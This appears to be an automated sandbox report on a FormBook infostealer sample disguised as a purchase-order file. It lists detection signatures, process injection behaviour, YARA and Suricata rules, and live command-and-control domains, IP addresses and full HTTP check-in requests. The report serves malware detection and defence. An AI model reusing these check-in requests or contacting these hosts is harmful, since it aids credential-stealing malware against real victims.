Edit tour

Windows Analysis Report
PO-DOC1522025-12.exe

Overview

General Information

Sample name:	PO-DOC1522025-12.exe
Analysis ID:	1591632
MD5:	dc2314bb7a5383eb616a78e1f43d4472
SHA1:	99cdff011d26e805ce19f8d84c5538181d02db0f
SHA256:	d26aea201415a8250f0ef469e579d33056696b102a6ca42ead5a838a29b15ba4
Tags:	exeQuotationuser-cocaman
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PO-DOC1522025-12.exe (PID: 1444 cmdline: "C:\Users\user\Desktop\PO-DOC1522025-12.exe" MD5: DC2314BB7A5383EB616A78E1F43D4472)

svchost.exe (PID: 5328 cmdline: "C:\Users\user\Desktop\PO-DOC1522025-12.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

wRnnQBtyTqqaEOnAYYgvzRWAV.exe (PID: 1672 cmdline: "C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 7116 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

wRnnQBtyTqqaEOnAYYgvzRWAV.exe (PID: 3328 cmdline: "C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5916 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5c9e6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x46085:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4e69da:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4d0079:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4e69da:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4d0079:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", CommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", ParentImage: C:\Users\user\Desktop\PO-DOC1522025-12.exe, ParentProcessId: 1444, ParentProcessName: PO-DOC1522025-12.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", ProcessId: 5328, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", CommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", ParentImage: C:\Users\user\Desktop\PO-DOC1522025-12.exe, ParentProcessId: 1444, ParentProcessName: PO-DOC1522025-12.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-DOC1522025-12.exe", ProcessId: 5328, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T08:28:32.233926+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49864	154.215.72.110	80	TCP
2025-01-15T08:29:04.255471+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49904	116.50.37.244	80	TCP
2025-01-15T08:30:30.972757+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49910	85.159.66.93	80	TCP
2025-01-15T08:30:44.635383+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49916	91.195.240.94	80	TCP
2025-01-15T08:31:06.171460+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49920	66.29.149.46	80	TCP
2025-01-15T08:31:19.801583+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49924	195.110.124.133	80	TCP
2025-01-15T08:31:49.267638+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49929	217.196.55.202	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PO-DOC1522025-12.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.rssnewscast.com/fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVV	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVV	Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVV	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: PO-DOC1522025-12.exe	Virustotal: Detection: 30%			Perma Link
Source: PO-DOC1522025-12.exe	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PO-DOC1522025-12.exe

Joe Sandbox ML: detected

Source: PO-DOC1522025-12.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4618964468.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2376979999.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO-DOC1522025-12.exe, 00000000.00000003.2158675460.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, PO-DOC1522025-12.exe, 00000000.00000003.2148299636.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204520279.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2206583062.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2302825113.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000C3E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2300126241.0000000000740000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO-DOC1522025-12.exe, 00000000.00000003.2158675460.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, PO-DOC1522025-12.exe, 00000000.00000003.2148299636.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2300439322.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204520279.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2206583062.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4622084079.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2302825113.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000C3E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2300126241.0000000000740000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2269062053.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300088852.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000003.2239214406.0000000000D55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4623285061.000000000329C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2377197229.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2594702561.000000003778C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4623285061.000000000329C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2377197229.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2594702561.000000003778C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2269062053.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300088852.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000003.2239214406.0000000000D55000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0017C2A2 FindFirstFileExW,	0_2_0017C2A2
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B68EE FindFirstFileW,FindClose,	0_2_001B68EE
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_001B698F
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001AD076
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001AD3A9
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_001B9642
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_001B979D
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_001B9B2B
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_001ADBBE
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_001B5C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001DBAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_001DBAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax	4_2_001C9480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	4_2_001CDD45
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_0099053E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49864 -> 154.215.72.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49904 -> 116.50.37.244:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49916 -> 91.195.240.94:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49929 -> 217.196.55.202:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49910 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49924 -> 195.110.124.133:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49920 -> 66.29.149.46:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 154.215.72.110 154.215.72.110

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001BCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_001BCE44

Source: global traffic	HTTP traffic detected: GET /fo8o/?pnGX8L3p=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?pnGX8L3p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?pnGX8L3p=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
